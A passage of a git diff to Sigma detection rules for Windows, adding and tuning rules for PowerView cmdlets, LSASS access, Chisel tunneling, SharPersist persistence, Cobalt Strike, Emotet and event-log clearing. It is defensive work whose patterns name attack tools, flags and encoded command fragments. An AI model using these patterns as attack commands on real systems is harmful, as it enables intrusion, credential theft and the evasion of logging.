Request-SPNTicket + - Get-DomainSPNTicket + - Invoke-Kerberoast + - Get-PathAcl + - Get-DNSZone + - Get-DomainDNSZone + - Get-DNSRecord + - Get-DomainDNSRecord + - Get-NetDomain + - Get-Domain + - Get-NetDomainController + - Get-DomainController + - Get-NetForest + - Get-Forest + - Get-NetForestDomain + - Get-ForestDomain + - Get-NetForestCatalog + - Get-ForestGlobalCatalog + - Find-DomainObjectPropertyOutlier + - Get-NetUser + - Get-DomainUser + - New-DomainUser + - Set-DomainUserPassword + - Get-UserEvent + - Get-DomainUserEvent + - Get-NetComputer + - Get-DomainComputer + - Get-ADObject + - Get-DomainObject + - Set-ADObject + - Set-DomainObject + - Get-ObjectAcl + - Get-DomainObjectAcl + - Add-ObjectAcl + - Add-DomainObjectAcl + - Invoke-ACLScanner + - Find-InterestingDomainAcl + - Get-NetOU + - Get-DomainOU + - Get-NetSite + - Get-DomainSite + - Get-NetSubnet + - Get-DomainSubnet + - Get-DomainSID + - Get-NetGroup + - Get-DomainGroup + - New-DomainGroup + - Find-ManagedSecurityGroups + - Get-DomainManagedSecurityGroup + - Get-NetGroupMember + - Get-DomainGroupMember + - Add-DomainGroupMember + - Get-NetFileServer + - Get-DomainFileServer + - Get-DFSshare + - Get-DomainDFSShare + - Get-NetGPO + - Get-DomainGPO + - Get-NetGPOGroup + - Get-DomainGPOLocalGroup + - Find-GPOLocation + - Get-DomainGPOUserLocalGroupMapping + - Find-GPOComputerAdmin + - Get-DomainGPOComputerLocalGroupMapping + - Get-DomainPolicy + - Get-NetLocalGroup + - Get-NetLocalGroupMember + - Get-NetShare + - Get-NetLoggedon + - Get-NetSession + - Get-LoggedOnLocal + - Get-RegLoggedOn + - Get-NetRDPSession + - Invoke-CheckLocalAdminAccess + - Test-AdminAccess + - Get-SiteName + - Get-NetComputerSiteName + - Get-Proxy + - Get-WMIRegProxy + - Get-LastLoggedOn + - Get-WMIRegLastLoggedOn + - Get-CachedRDPConnection + - Get-WMIRegCachedRDPConnection + - Get-RegistryMountedDrive + - Get-WMIRegMountedDrive + - Get-NetProcess + - Get-WMIProcess + - Find-InterestingFile + - Invoke-UserHunter + - Find-DomainUserLocation + - Invoke-ProcessHunter + - Find-DomainProcess + - Invoke-EventHunter + - Find-DomainUserEvent + - Invoke-ShareFinder + - Find-DomainShare + - Invoke-FileFinder + - Find-InterestingDomainShareFile + - Find-LocalAdminAccess + - Invoke-EnumerateLocalAdmin + - Find-DomainLocalGroupMember + - Get-NetDomainTrust + - Get-DomainTrust + - Get-NetForestTrust + - Get-ForestTrust + - Find-ForeignUser + - Get-DomainForeignUser + - Find-ForeignGroup + - Get-DomainForeignGroupMember + - Invoke-MapDomainTrust + - Get-DomainTrustMapping + condition: selection falsepositives: - Should not be any as administrators do not use this tool level: high diff --git a/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml b/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml index f450b9dee..d7f20b484 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml @@ -9,15 +9,17 @@ references: - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2 - https://www.ietf.org/rfc/rfc2821.txt author: frack113 -date: 2022/01/07 +date: 2022/09/26 logsource: product: windows category: ps_script definition: Script block logging must be enabled detection: - selection_cmdlet: - ScriptBlockText|contains: Send-MailMessage - condition: selection_cmdlet + selection: + ScriptBlockText|contains: 'Send-MailMessage' + filter: + ScriptBlockText|contains: 'CmdletsToExport' + condition: selection and not filter falsepositives: - Legitimate script level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml new file mode 100644 index 000000000..5815a0ca6 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml @@ -0,0 +1,35 @@ +title: Powershell Sensitive File Discovery +id: 7d416556-6502-45b2-9bad-9d2f05f38997 +related: + - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 + type: derived +description: Detect adversaries enumerate sensitive files +references: + - https://twitter.com/malmoeb/status/1570814999370801158 +status: experimental +author: frack113 +date: 2022/09/16 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection_action: + ScriptBlockText|contains: + - ls + - get-childitem + - gci + selection_recurse: + ScriptBlockText|contains: '-recurse' + selection_file: + ScriptBlockText|contains: + - '.pass' + - '.kdbx' + - '.kdb' + condition: all of selection_* +falsepositives: + - Unknown +level: medium +tags: + - attack.discovery + - attack.t1083 diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml new file mode 100644 index 000000000..49a838e80 --- /dev/null +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml @@ -0,0 +1,31 @@ +title: Suspicious Eventlog Clear +id: 0f017df3-8f5a-414f-ad6b-24aff1128278 +related: + - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5 + type: derived +description: Detects usage of known powershell cmdlets such as "Clear-EventLog" to clear the windows event logs +references: + - https://twitter.com/oroneequalsone/status/1568432028361830402 + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md + - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html +status: experimental +author: Nasreddine Bencherchali +date: 2022/09/12 +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + selection: + ScriptBlockText|contains: + - 'Clear-EventLog ' + - 'Remove-EventLog ' + - 'Limit-EventLog ' + - 'Clear-WinEvent ' + condition: selection +falsepositives: + - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate +level: medium +tags: + - attack.defense_evasion + - attack.t1070.001 diff --git a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml index e344a07ee..3b73fd598 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_web_request.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_web_request.yml @@ -10,7 +10,7 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019/10/24 -modified: 2021/10/16 +modified: 2022/09/26 tags: - attack.execution - attack.t1059.001 @@ -27,7 +27,9 @@ detection: - 'curl ' - 'Net.WebClient' - 'Start-BitsTransfer' - condition: selection + filter: + Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\' + condition: selection and not filter falsepositives: - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. level: medium diff --git a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml index ab575a468..b322595a4 100755 --- a/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml +++ b/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml @@ -5,7 +5,7 @@ description: Detects process access LSASS memory which is typical for credential author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update) date: 2017/02/16 -modified: 2022/07/05 +modified: 2022/09/13 references: - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow - https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html @@ -119,6 +119,9 @@ detection: filter_webex: SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe' GrantedAccess: '0x401' + filter_malwarebytes: + SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe' + GrantedAccess: '0x1410' # Old - too broad filter # SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts # - '\wmiprvse.exe' diff --git a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml index c449009b1..30041efde 100755 --- a/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml @@ -6,7 +6,7 @@ references: status: experimental author: Christian Burkard, Tim Shelton date: 2021/07/28 -modified: 2022/08/09 +modified: 2022/09/20 logsource: category: process_access product: windows @@ -32,6 +32,26 @@ detection: falsepositive6: TargetImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' SourceImage|endswith: 'C:\Program Files\Mozilla Firefox\firefox.exe' + falsepositive7: # VsCode + TargetImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + SourceImage|endswith: '\AppData\Local\Programs\Microsoft VS Code\Code.exe' + falsepositive8: # Google Chrome + TargetImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + SourceImage|endswith: 'C:\Program Files\Google\Chrome\Application\chrome.exe' + falsepositive9: # Google Chrome Update + TargetImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + SourceImage|endswith: 'C:\Program Files (x86)\Google\Update\GoogleUpdate.exe' + falsepositive10: # MS Teams + TargetImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe' + falsepositives11: + TargetImage: 'C:\Windows\System32\backgroundTaskHost.exe' + SourceImage: 'C:\Windows\System32\backgroundTaskHost.exe' + falsepositives12: + TargetImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' + SourceImage: 'C:\Program Files (x86)\CCleaner Browser\Application\CCleanerBrowser.exe' + falsepositive_kerneltrace_edge: # Cases in which the CallTrace is just e.g. 'UNKNOWN(19290435374)' from Microsoft-Windows-Kernel-Audit-API-Calls provider + Provider_Name: 'Microsoft-Windows-Kernel-Audit-API-Calls' condition: selection and not 1 of falsepositive* falsepositives: - Unknown diff --git a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml index 51c980f05..e9f723900 100644 --- a/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml +++ b/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml @@ -7,7 +7,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule) author: Florian Roth date: 2022/03/13 -modified: 2022/08/13 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -38,8 +38,8 @@ detection: - 'C:\Windows\System32\lsass.exe' - 'C:\WINDOWS\System32\perfmon.exe' - 'C:\WINDOWS\system32\wbem\wmiprvse.exe' - - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' - - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' + - 'C:\Windows\sysWOW64\wbem\wmiprvse.exe' + - 'C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe' # Windows Defender filter2: SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\' @@ -92,6 +92,10 @@ detection: - '\MBAMInstallerService.exe' - '\WebEx\WebexHost.exe ' - '\Programs\Microsoft VS Code\Code.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' + filter_xampp: + SourceImage|endswith: '\xampp-control.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User diff --git a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml index e984d6e97..726d944dc 100644 --- a/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml +++ b/rules/windows/process_access/proc_access_win_susp_proc_access_lsass_susp_source.yml @@ -4,7 +4,7 @@ status: experimental description: Detects process access to LSASS memory with suspicious access flags and from a suspicious folder author: Florian Roth date: 2021/11/27 -modified: 2022/07/07 +modified: 2022/09/20 references: - https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights - https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow @@ -65,6 +65,7 @@ detection: - '\MBAMInstallerService.exe' - '\WebexMTA.exe' - '\WebEx\WebexHost.exe' + - '\JetBrains\Toolbox\bin\jetbrains-toolbox.exe' GrantedAccess: '0x410' filter2: SourceImage|startswith: 'C:\Windows\Temp\' @@ -84,9 +85,9 @@ detection: - '\vs_bootstrapper_' GrantedAccess: '0x1410' filter_chrome: - SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' - SourceImage|endswith: '.tmp\GoogleUpdate.exe' - GrantedAccess: '0x410' + SourceImage|startswith: 'C:\Program Files (x86)\Google\Temp\' + SourceImage|endswith: '.tmp\GoogleUpdate.exe' + GrantedAccess: '0x410' condition: selection and not 1 of filter* fields: - User diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index 171a30883..d9d77b85b 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml @@ -4,6 +4,7 @@ status: experimental description: Detects shellcode injection by Metasploit's migrate and Empire's psinject author: Bhabesh Raj date: 2022/03/11 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.privilege_escalation @@ -13,11 +14,38 @@ logsource: product: windows detection: selection: - GrantedAccess: + GrantedAccess: - '0x147a' - '0x1f3fff' CallTrace|contains: 'UNKNOWN' - condition: selection + filter_dell_folders: + # If dell software is installed we get matches like these + # Example 1: + # SourceImage: C:\Program Files\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 2: + # SourceImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # TargetImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # GrantedAccess: 0x1F3FFF + # Example 3: + # SourceImage: C:\Program Files\Dell\TechHub\Dell.TechHub.exe + # TargetImage: C:\Program Files (x86)\Dell\UpdateService\DCF\Dell.DCF.UA.Bradbury.API.SubAgent.exe + # GrantedAccess: 0x1F3FFF + SourceImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + TargetImage|startswith: + - 'C:\Program Files\Dell\' + - 'C:\Program Files (x86)\Dell\' + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + filter_dell_specifc: + SourceImage: C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe + TargetImage: C:\Windows\Explorer.EXE + GrantedAccess: 0x1F3FFF + CallTrace|startswith: 'C:\Windows\System32\ntdll.dll' + condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 3282e8630..1a9204e31 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -13,6 +13,7 @@ tags: - attack.s0190 - attack.t1036.003 date: 2022/06/28 +modified: 2022/09/13 author: Florian Roth logsource: category: process_creation @@ -28,6 +29,7 @@ detection: CommandLine|contains: - 'C:\Windows\Temp\' - '%temp%' + - '%tmp%' - 'C:\ProgramData\' - '%ProgramData%' - '\AppData\Local\' diff --git a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml new file mode 100644 index 000000000..0ed05a1e0 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml @@ -0,0 +1,37 @@ +title: Chisel Tunneling Tool Usage +id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 +related: + - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf + type: similar +status: experimental +description: Detects usage of the Chisel tunneling tool via the commandline arguments +author: Florian Roth +references: + - https://github.com/jpillora/chisel/ + - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/ +date: 2022/09/13 +tags: + - attack.command_and_control + - attack.t1090.001 +logsource: + category: process_creation + product: windows +detection: + selection_img: + Image|endswith: '\chisel.exe' + selection_param1: + CommandLine|contains: + - 'exe client ' + - 'exe server ' + selection_param2: + CommandLine|contains: + - ' --socks5' + - ' --reverse' + - ' r:' + - ':127.0.0.1:' + - ' --tls-skip-verify ' + - ':socks' + condition: selection_img or all of selection_param* +falsepositives: + - Some false positives may occure with other tools with similar commandlines +level: high diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 734fa9286..14fc79e5e 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -6,6 +6,7 @@ author: Nasreddine Bencherchali references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ date: 2022/07/12 +modified: 2022/09/14 logsource: category: process_creation product: windows @@ -19,6 +20,7 @@ detection: - ' > \Users\Public\' - ' > C:\Users\Public\' - ' > %TEMP%\' + - ' > %TMP%\' condition: selection falsepositives: - Legitimate admin scripts diff --git a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml index 36718bfa0..7f43b42ec 100644 --- a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml @@ -12,7 +12,7 @@ tags: - car.2019-04-001 author: Nik Seetharaman, Christian Burkard date: 2019/07/31 -modified: 2021/08/31 +modified: 2022/09/21 references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ - https://twitter.com/hFireF0X/status/897640081053364225 @@ -25,8 +25,8 @@ detection: selection: ParentImage|endswith: '\DllHost.exe' IntegrityLevel: - - 'High' - - 'System' + - 'High' + - 'System' ParentCommandLine|contains: - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml index fa318be5f..59d50cbdb 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_load_by_rundll32.yml @@ -3,7 +3,7 @@ status: test id: ae9c6a7c-9521-42a6-915e-5aaa8689d529 author: Wojciech Lesicki date: 2021/06/01 -modified: 2022/03/04 +modified: 2022/09/16 description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. references: - https://www.cobaltstrike.com/help-windows-executable @@ -16,14 +16,18 @@ logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains|all: + selection_rundll: + - Image|endswith: '\rundll32.exe' + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: - 'rundll32.exe' - - '.dll' + - 'rundll32 ' + selection_params: + CommandLine|contains: '.dll' CommandLine|endswith: - ' StartW' - ',StartW' - condition: selection + condition: all of selection* falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml index 851989769..f4328767e 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml @@ -7,34 +7,39 @@ references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ date: 2021/07/27 -modified: 2022/03/05 +modified: 2022/09/20 tags: - attack.execution - - attack.t1059 + - attack.t1059 logsource: category: process_creation product: windows detection: - selection1: + selection1: CommandLine|contains: '\cmd.exe /C whoami' ParentImage|startswith: 'C:\Temp' selection2: - CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' - ParentCommandLine|contains: - - '/C whoami' - - 'cmd.exe /C echo' - - ' > \\\\.\\pipe' - selection3: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c echo' - '> \\\\.\\pipe' - '\whoami.exe' ParentImage|endswith: '\dllhost.exe' - selection4: + selection3: Image|endswith: '\cmd.exe' ParentImage|endswith: '\runonce.exe' ParentCommandLine|endswith: '\runonce.exe' - condition: 1 of selection* + selection_special1: + CommandLine|contains: 'conhost.exe 0xffffffff -ForceV1' + ParentCommandLine|contains: + - '/C whoami' + - 'cmd.exe /C echo' + - ' > \\\\.\\pipe' + filter_special1: + # Internet Download Manager - Chrome Extension + ParentCommandLine|contains: + - 'C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe' + - 'chrome-extension://' + condition: 1 of selection* and (selection_special1 and not filter_special1) falsepositives: - Other programs that cause these patterns (please report) level: high diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index 0c13c80cc..d5c4a6811 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -3,7 +3,7 @@ status: experimental id: 1327381e-6ab0-4f38-b583-4c1b8346a56b author: Christian Burkard date: 2021/10/26 -modified: 2022/02/02 +modified: 2022/09/20 description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal references: - https://twitter.com/hexacorn/status/1448037865435320323 @@ -24,8 +24,11 @@ detection: selection2: CommandLine|contains: '.exe\..\' filter: - CommandLine|contains: '\Google\Drive\googledrivesync.exe\..\' + CommandLine|contains: + - '\Google\Drive\googledrivesync.exe\..\' + - '\Citrix\Virtual Smart Card\Citrix.Authentication.VirtualSmartcard.Launcher.exe\..\' condition: 1 of selection* and not filter falsepositives: - Google Drive + - Citrix level: high diff --git a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml index 2cdf79b9f..805d9eeae 100644 --- a/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml +++ b/rules/windows/process_creation/proc_creation_win_dnscmd_discovery.yml @@ -1,23 +1,24 @@ title: Discovery/Execution via dnscmd.exe id: b6457d63-d2a2-4e29-859d-4e7affc153d1 -description: | +description: | Detects an attempt to add a potentially crafted DLL as a plug in of the DNS Service. Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain references: - - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd - - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records - - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd + - https://docs.microsoft.com/en-us/azure/dns/dns-zones-records + - https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/ status: experimental author: '@gott_cyber' date: 2022/07/31 +modified: 2022/09/14 tags: - - attack.discovery - - attack.execution - - attack.t1543.003 + - attack.discovery + - attack.execution + - attack.t1543.003 logsource: - category: process_creation - product: windows + category: process_creation + product: windows detection: dnscmd: Image|endswith: '\dnscmd.exe' @@ -25,6 +26,7 @@ detection: CommandLine|contains: - '/enumrecords' - '/enumzones' + - '/ZonePrint' - '/info' selection_2: CommandLine|contains|all: diff --git a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml index 1202cc9f2..7bc952889 100644 --- a/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml +++ b/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml @@ -25,7 +25,11 @@ detection: - 'C:\Public\' - '\AppData\Local\Temp\' - '\AppData\Roaming\Temp\' - condition: selection + filter_dell: + # Launched by Dell ServiceShell.exe + ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe' + CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\' + condition: selection and not 1 of filter_* fields: - ComputerName - User diff --git a/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml new file mode 100644 index 000000000..51ca980d6 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml @@ -0,0 +1,40 @@ +title: SharPersist Usage +id: 26488ad0-f9fd-4536-876f-52fea846a2e4 +status: experimental +description: Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms +author: Florian Roth +references: + - https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit + - https://github.com/mandiant/SharPersist +date: 2022/09/15 +logsource: + category: process_creation + product: windows +tags: + - attack.persistence + - attack.t1053 +detection: + selection1: + Image|endswith: '\SharPersist.exe' + selection2: + Product: 'SharPersist' + selection3: + CommandLine|contains: + - ' -t schtask -c ' + - ' -t startupfolder -c ' + selection4: + CommandLine|contains|all: + - ' -t reg -c ' + - ' -m add' + selection5: + CommandLine|contains|all: + - ' -t service -c ' + - ' -m add' + selection6: + CommandLine|contains|all: + - ' -t schtask -c ' + - ' -m add' + condition: 1 of selection* +falsepositives: + - Unknown +level: high diff --git a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml index c0ba595f8..64e40c05f 100644 --- a/rules/windows/process_creation/proc_creation_win_malware_emotet.yml +++ b/rules/windows/process_creation/proc_creation_win_malware_emotet.yml @@ -4,7 +4,7 @@ status: stable description: Detects all Emotet like process executions that are not covered by the more generic rules author: Florian Roth date: 2019/09/30 -modified: 2021/11/29 +modified: 2022/09/27 tags: - attack.execution - attack.t1059.001 @@ -32,7 +32,12 @@ detection: - 'PQAkAGUAbgB2ADoAdABlAG0AcAArACgA' # =$env:temp+( - '0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA' # =$env:temp+( - '9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA' # =$env:temp+( - condition: selection + filter: + CommandLine|contains: + - 'fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ' + - 'wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA' + - '8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA' + condition: selection and not filter fields: - CommandLine - ParentCommandLine diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index e7200ba8f..0fb8cc3ec 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -7,7 +7,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc date: 2022/01/07 -modified: 2022/06/12 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -25,9 +25,14 @@ detection: - ' /g' - ' /u' - ' /p' - condition: all of selection_mstsc* or all of selection_cmdkey* + filter_mstsc_1: + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp + ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' + CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp' + condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - - Unknown + - WSL (Windows Sub System For Linux) + - Other currently unknown software level: medium tags: - attack.lateral_movement diff --git a/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml b/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml index f20dced4e..d608a60d4 100644 --- 